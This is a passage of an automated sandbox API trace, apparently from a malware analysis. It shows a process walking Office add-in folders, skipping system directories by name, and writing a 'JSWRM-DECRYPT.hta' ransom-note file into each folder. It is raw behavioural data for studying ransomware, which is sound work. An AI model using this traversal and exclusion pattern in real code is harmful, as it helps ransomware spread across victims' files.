dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.369] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40318050, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40318050, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40318050, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.369] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.369] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.369] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.370] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1329a43, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1329a43, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.370] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf71003, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfbd422, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3daa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.370] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.371] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63a12a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63a12a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.371] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.371] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63a12a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63a12a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.371] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0123.371] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sk", cAlternateFileName="")) returned 1 [0123.371] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0123.371] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0123.371] lstrcmpiW (lpString1="sk", lpString2="...") returned 1 [0123.371] lstrcmpiW (lpString1="sk", lpString2="windows") returned -1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="recovery") returned 1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="perflogs") returned 1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="documents and settings") returned 1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="$RECYCLE.BIN") returned 1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="system volume information") returned -1 [0123.372] lstrcmpiW (lpString1="sk", lpString2="msocache") returned 1 [0123.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sk\\jswrm-decrypt.hta")) returned 0xffffffff [0123.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.376] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.376] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.377] CloseHandle (hObject=0x338) returned 1 [0123.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sk\\jswrm-decrypt.hta")) returned 0x20 [0123.377] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sk\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0123.377] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.377] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.377] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.377] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.377] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4033dfe0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4033dfe0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.377] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.378] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd09866, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd09866, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.378] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.378] lstrcmpiW 